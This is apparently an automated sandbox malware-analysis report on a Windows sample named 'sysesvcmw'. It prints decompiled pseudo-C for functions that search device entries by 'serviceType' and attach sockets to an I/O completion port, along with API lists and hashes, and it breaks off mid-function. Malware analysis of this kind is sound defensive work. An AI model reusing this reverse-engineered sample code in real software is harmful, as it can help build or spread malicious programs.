                                                                                                                                                                                                                                                                                    • Instruction ID: 91ab58cec92addcf45ea7f885c8d98816f20cb839f54337aae792cd6c89d1592
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 165bc14b1495aa1e34f09e783435704cf9eca48613dfae01915159d308c3408b
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941E975A0020ADFCB04DF98D894BAFB7B5BF48304F108269E515A7390D778AA85CF95
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 48%
                                                                                                                                                                                                                                                                                    			E0040C700(intOrPtr* _a4, WCHAR* _a8) {
                                                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                                                    				WCHAR* _v12;
                                                                                                                                                                                                                                                                                    				WCHAR* _v16;
                                                                                                                                                                                                                                                                                    				void* _v20;
                                                                                                                                                                                                                                                                                    				WCHAR* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr* _v28;
                                                                                                                                                                                                                                                                                    				WCHAR* _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_push( &_v8);
                                                                                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                                                                                    				if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x20))))() == 0 && _v8 != 0) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					while(_v16 < _v8) {
                                                                                                                                                                                                                                                                                    						_v20 = 0;
                                                                                                                                                                                                                                                                                    						_push( &_v20);
                                                                                                                                                                                                                                                                                    						_push(_v16);
                                                                                                                                                                                                                                                                                    						_push(_a4);
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *_a4 + 0x1c))))() != 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                                                                                                    							_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_v24 = 0;
                                                                                                                                                                                                                                                                                    							_push( &_v24);
                                                                                                                                                                                                                                                                                    							_push(_v20);
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)( *((intOrPtr*)( *_v20 + 0xa4))))() == 0 && _v24 != 0) {
                                                                                                                                                                                                                                                                                    								if(lstrcmpiW(_v24, L"service") == 0) {
                                                                                                                                                                                                                                                                                    									_t65 = E0040C200(_v20, L"serviceType");
                                                                                                                                                                                                                                                                                    									_t99 = _t99 + 8;
                                                                                                                                                                                                                                                                                    									_v28 = _t65;
                                                                                                                                                                                                                                                                                    									if(_v28 != 0) {
                                                                                                                                                                                                                                                                                    										_v32 = 0;
                                                                                                                                                                                                                                                                                    										_push( &_v32);
                                                                                                                                                                                                                                                                                    										_push(_v28);
                                                                                                                                                                                                                                                                                    										if( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 0x68))))() == 0 && _v32 != 0) {
                                                                                                                                                                                                                                                                                    											if(lstrcmpiW(_v32, _a8) == 0) {
                                                                                                                                                                                                                                                                                    												_v12 = _v20;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											__imp__#6(_v32);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										 *((intOrPtr*)( *((intOrPtr*)( *_v28 + 8))))(_v28);
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								__imp__#6(_v24);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							if(_v12 == 0) {
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_v20 + 8))))(_v20);
                                                                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L22:
                                                                                                                                                                                                                                                                                    				return _v12;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x0040c706
                                                                                                                                                                                                                                                                                    0x0040c70d
                                                                                                                                                                                                                                                                                    0x0040c717
                                                                                                                                                                                                                                                                                    0x0040c720
                                                                                                                                                                                                                                                                                    0x0040c728
                                                                                                                                                                                                                                                                                    0x0040c738
                                                                                                                                                                                                                                                                                    0x0040c74a
                                                                                                                                                                                                                                                                                    0x0040c756
                                                                                                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                                                                                                    0x0040c76d
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c853
                                                                                                                                                                                                                                                                                    0x0040c747
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c78f
                                                                                                                                                                                                                                                                                    0x0040c798
                                                                                                                                                                                                                                                                                    0x0040c7a3
                                                                                                                                                                                                                                                                                    0x0040c7c4
                                                                                                                                                                                                                                                                                    0x0040c7cf
                                                                                                                                                                                                                                                                                    0x0040c7d4
                                                                                                                                                                                                                                                                                    0x0040c7d7
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                                                                    0x0040c7f3
                                                                                                                                                                                                                                                                                    0x0040c7fb
                                                                                                                                                                                                                                                                                    0x0040c813
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x0040c851
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c843
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c74a
                                                                                                                                                                                                                                                                                    0x0040c858
                                                                                                                                                                                                                                                                                    0x0040c85e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C7BC
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C80B
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C81F
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C837
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                                    • Opcode ID: 4741d0aecfd52b34991c53ee9f419a60a0185f3e41b6d02d04152173c09516f5
                                                                                                                                                                                                                                                                                    • Instruction ID: 7b8bcaea6bed01b8a99884d554dfbf2528ef8f0724b329980c1be25b89f5103a
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4741d0aecfd52b34991c53ee9f419a60a0185f3e41b6d02d04152173c09516f5
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3641FF75A0020ADFCB04EF98C884BAFB7B5BF48305F108269E515A7390D7789E85CB99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                                                                                                                                                    			E0040DF90(intOrPtr __eax, void* _a4) {
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                                                                    				long _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t45;
                                                                                                                                                                                                                                                                                    				struct _CRITICAL_SECTION* _t48;
                                                                                                                                                                                                                                                                                    				long _t49;
                                                                                                                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t53 = _a4;
                                                                                                                                                                                                                                                                                    				_t45 = __eax;
                                                                                                                                                                                                                                                                                    				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    					_t48 = __eax + 0x20;
                                                                                                                                                                                                                                                                                    					_t37 = 0;
                                                                                                                                                                                                                                                                                    					EnterCriticalSection(_t48);
                                                                                                                                                                                                                                                                                    					_t20 =  *((intOrPtr*)(_t45 + 0x38));
                                                                                                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                                                                                                    						while( *((intOrPtr*)(_t20 + 0x260)) != _t53) {
                                                                                                                                                                                                                                                                                    							_t20 =  *((intOrPtr*)(_t20 + 0x280));
                                                                                                                                                                                                                                                                                    							if(_t20 != 0) {
                                                                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t37 = 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    					LeaveCriticalSection(_t48);
                                                                                                                                                                                                                                                                                    					if(_t37 == 0) {
                                                                                                                                                                                                                                                                                    						_t49 = E00408B00(0x284);
                                                                                                                                                                                                                                                                                    						_t55 = _t54 + 4;
                                                                                                                                                                                                                                                                                    						if(_t49 == 0) {
                                                                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                                                                    							E00409600(_t53);
                                                                                                                                                                                                                                                                                    							return _t49;
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t7 = _t49 + 0x264; // 0x264
                                                                                                                                                                                                                                                                                    							 *_t49 = 0x69636c69;
                                                                                                                                                                                                                                                                                    							 *(_t49 + 0x260) = _t53;
                                                                                                                                                                                                                                                                                    							_a4 = 0x10;
                                                                                                                                                                                                                                                                                    							__imp__#5(_t53, _t7,  &_a4);
                                                                                                                                                                                                                                                                                    							if(CreateIoCompletionPort( *(_t49 + 0x260),  *(_t45 + 8), _t49, 0) !=  *(_t45 + 8)) {
                                                                                                                                                                                                                                                                                    								E00408C70(_t49);
                                                                                                                                                                                                                                                                                    								_t55 = _t55 + 4;
                                                                                                                                                                                                                                                                                    								_t49 = 0;
                                                                                                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								_t28 = E0040BE60();
                                                                                                                                                                                                                                                                                    								_t13 = _t49 + 4; // 0x4
                                                                                                                                                                                                                                                                                    								InterlockedExchange(_t13, _t28);
                                                                                                                                                                                                                                                                                    								_t14 = _t49 + 0x244; // 0x244
                                                                                                                                                                                                                                                                                    								_t15 = _t49 + 8; // 0x8
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t49 + 0x27c)) = _t45;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t49 + 0x224)) = 0x200;
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t49 + 0x228)) = _t15;
                                                                                                                                                                                                                                                                                    								InitializeCriticalSection(_t14);
                                                                                                                                                                                                                                                                                    								InterlockedIncrement(_t45 + 0x3c);
                                                                                                                                                                                                                                                                                    								E0040DEB0(_t49);
                                                                                                                                                                                                                                                                                    								return _t49;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						return 0;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                                                                                    0x0040df91
                                                                                                                                                                                                                                                                                    0x0040df96
                                                                                                                                                                                                                                                                                    0x0040df9b
                                                                                                                                                                                                                                                                                    0x0040dfa4
                                                                                                                                                                                                                                                                                    0x0040dfa8
                                                                                                                                                                                                                                                                                    0x0040dfaa
                                                                                                                                                                                                                                                                                    0x0040dfb0
                                                                                                                                                                                                                                                                                    0x0040dfb5
                                                                                                                                                                                                                                                                                    0x0040dfb7
                                                                                                                                                                                                                                                                                    0x0040dfbf
                                                                                                                                                                                                                                                                                    0x0040dfc7
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dfc9
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040dfc7
                                                                                                                                                                                                                                                                                    0x0040dfcb
                                                                                                                                                                                                                                                                                    0x0040dfcb
                                                                                                                                                                                                                                                                                    0x0040dfcd
                                                                                                                                                                                                                                                                                    0x0040dfce
                                                                                                                                                                                                                                                                                    0x0040dfd6
                                                                                                                                                                                                                                                                                    0x0040dfe9
                                                                                                                                                                                                                                                                                    0x0040dfeb
                                                                                                                                                                                                                                                                                    0x0040dff0
                                                                                                                                                                                                                                                                                    0x0040e08d
                                                                                                                                                                                                                                                                                    0x0040e08e
                                                                                                                                                                                                                                                                                    0x0040e09c
                                                                                                                                                                                                                                                                                    0x0040dff6
                                                                                                                                                                                                                                                                                    0x0040dffb
                                                                                                                                                                                                                                                                                    0x0040e003
                                                                                                                                                                                                                                                                                    0x0040e009
                                                                                                                                                                                                                                                                                    0x0040e00f
                                                                                                                                                                                                                                                                                    0x0040e017
                                                                                                                                                                                                                                                                                    0x0040e034
                                                                                                                                                                                                                                                                                    0x0040e083
                                                                                                                                                                                                                                                                                    0x0040e088
                                                                                                                                                                                                                                                                                    0x0040e08b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040e036
                                                                                                                                                                                                                                                                                    0x0040e036
                                                                                                                                                                                                                                                                                    0x0040e03c
                                                                                                                                                                                                                                                                                    0x0040e040
                                                                                                                                                                                                                                                                                    0x0040e046
                                                                                                                                                                                                                                                                                    0x0040e04c
                                                                                                                                                                                                                                                                                    0x0040e050
                                                                                                                                                                                                                                                                                    0x0040e056
                                                                                                                                                                                                                                                                                    0x0040e060
                                                                                                                                                                                                                                                                                    0x0040e066
                                                                                                                                                                                                                                                                                    0x0040e070
                                                                                                                                                                                                                                                                                    0x0040e076
                                                                                                                                                                                                                                                                                    0x0040e081
                                                                                                                                                                                                                                                                                    0x0040e081
                                                                                                                                                                                                                                                                                    0x0040e034
                                                                                                                                                                                                                                                                                    0x0040dfd8
                                                                                                                                                                                                                                                                                    0x0040dfde
                                                                                                                                                                                                                                                                                    0x0040dfde
                                                                                                                                                                                                                                                                                    0x0040df9e
                                                                                                                                                                                                                                                                                    0x0040dfa1
                                                                                                                                                                                                                                                                                    0x0040dfa1

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,0040E49B,00000000), ref: 0040DFAA
                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,0040E49B,00000000), ref: 0040DFCE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                    • Opcode ID: acf582c9f46a2137a39eec74a6870d9bb4a9c089b8521e7e280b1c815e7e1608
                                                                                                                                                                                                                                                                                    • Instruction ID: 788f702b9492d2748fa33cb2f0bef3e81c848d8eff2aac60f157a8f848454262
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: acf582c9f46a2137a39eec74a6870d9bb4a9c089b8521e7e280b1c815e7e1608
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC31D472601615ABC710AFB5EC88BD7B7E8FF44724F00893EF54AD3281DB39A4448B99
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                    			E0040C741() {
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t85 - 0xc)) >=  *((intOrPtr*)(_t85 - 4))) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                                                                    					 *(_t85 - 0x10) = 0;
                                                                                                                                                                                                                                                                                    					_push(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 - 0xc)));
                                                                                                                                                                                                                                                                                    					_push( *((intOrPtr*)(_t85 + 8)));
                                                                                                                                                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 + 8)))) + 0x1c))))() != 0 ||  *(_t85 - 0x10) == 0) {
                                                                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                                                                    						 *(_t85 - 0x14) = 0;
                                                                                                                                                                                                                                                                                    						_push(_t85 - 0x14);
                                                                                                                                                                                                                                                                                    						_push( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 0xa4))))() == 0 &&  *(_t85 - 0x14) != 0) {
                                                                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                                                                    							if(lstrcmpiW( *(_t85 - 0x14), L"service") == 0) {
                                                                                                                                                                                                                                                                                    								L7:
                                                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t85 - 0x18)) = E0040C200( *(_t85 - 0x10), L"serviceType");
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(_t85 - 0x18)) != 0) {
                                                                                                                                                                                                                                                                                    									L8:
                                                                                                                                                                                                                                                                                    									 *(_t85 - 0x1c) = 0;
                                                                                                                                                                                                                                                                                    									_push(_t85 - 0x1c);
                                                                                                                                                                                                                                                                                    									_push( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    									if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 0x68))))() == 0 &&  *(_t85 - 0x1c) != 0) {
                                                                                                                                                                                                                                                                                    										L10:
                                                                                                                                                                                                                                                                                    										if(lstrcmpiW( *(_t85 - 0x1c),  *(_t85 + 0xc)) == 0) {
                                                                                                                                                                                                                                                                                    											 *(_t85 - 8) =  *(_t85 - 0x10);
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										L12:
                                                                                                                                                                                                                                                                                    										__imp__#6( *(_t85 - 0x1c));
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									L13:
                                                                                                                                                                                                                                                                                    									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85 - 0x18)))) + 8))))( *((intOrPtr*)(_t85 - 0x18)));
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                                                                    							__imp__#6( *(_t85 - 0x14));
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                                                                    						if( *(_t85 - 8) == 0) {
                                                                                                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)( *( *(_t85 - 0x10)) + 8))))( *(_t85 - 0x10));
                                                                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					break;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				L19:
                                                                                                                                                                                                                                                                                    				return  *(_t85 - 8);
                                                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                                                    0x0040c741
                                                                                                                                                                                                                                                                                    0x0040c741
                                                                                                                                                                                                                                                                                    0x0040c741
                                                                                                                                                                                                                                                                                    0x0040c747
                                                                                                                                                                                                                                                                                    0x0040c750
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c756
                                                                                                                                                                                                                                                                                    0x0040c756
                                                                                                                                                                                                                                                                                    0x0040c760
                                                                                                                                                                                                                                                                                    0x0040c764
                                                                                                                                                                                                                                                                                    0x0040c76d
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c853
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c785
                                                                                                                                                                                                                                                                                    0x0040c78f
                                                                                                                                                                                                                                                                                    0x0040c798
                                                                                                                                                                                                                                                                                    0x0040c7a3
                                                                                                                                                                                                                                                                                    0x0040c7b3
                                                                                                                                                                                                                                                                                    0x0040c7c4
                                                                                                                                                                                                                                                                                    0x0040c7c6
                                                                                                                                                                                                                                                                                    0x0040c7d7
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                                                                    0x0040c7e0
                                                                                                                                                                                                                                                                                    0x0040c7ea
                                                                                                                                                                                                                                                                                    0x0040c7f3
                                                                                                                                                                                                                                                                                    0x0040c7fb
                                                                                                                                                                                                                                                                                    0x0040c803
                                                                                                                                                                                                                                                                                    0x0040c813
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c818
                                                                                                                                                                                                                                                                                    0x0040c81b
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c81f
                                                                                                                                                                                                                                                                                    0x0040c825
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c831
                                                                                                                                                                                                                                                                                    0x0040c7de
                                                                                                                                                                                                                                                                                    0x0040c833
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c837
                                                                                                                                                                                                                                                                                    0x0040c83d
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x0040c845
                                                                                                                                                                                                                                                                                    0x0040c851
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c851
                                                                                                                                                                                                                                                                                    0x0040c841
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x0040c775
                                                                                                                                                                                                                                                                                    0x0040c858
                                                                                                                                                                                                                                                                                    0x0040c85e

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,service), ref: 0040C7BC
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(00000000,00000000), ref: 0040C80B
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C81F
                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0040C837
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.889526747.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889522847.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889535533.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889540457.0000000000414000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889544585.0000000000415000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.889548589.0000000000416000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_ sysesvcmw.jbxd
                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FreeStringlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: service$serviceType
                                                                                                                                                                                                                                                                                    • API String ID: 1602765415-3667235276
                                                                                                                                                                                                                                                                                    • Opcode ID: 57d823261c39902ee773dc23455852ca3ca2d32db1bb6f44af686056f0d9f317
                                                                                                                                                                                                                                                                                    • Instruction ID: a2ae9d540b18a7237781164838fed95b9af08367ec0547399f69e9a392117d82
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57d823261c39902ee773dc23455852ca3ca2d32db1bb6f44af686056f0d9f317
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5631CA75E0020ADFCB04DF98D884BAFB7B5AF88305F108669E515A7390D7789A85CB98
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                                                                                                                                                    			E0040C921() {
                                                                                                                                                                                                                                                                                    				void* _t85;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				L0:
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					L0:
                                                                                                                                                                                                                                                                                    					 *((intOrPtr*)(_t85 - 0xc)) =  *((intOrPtr*)(_t85 - 0xc)) + 1;
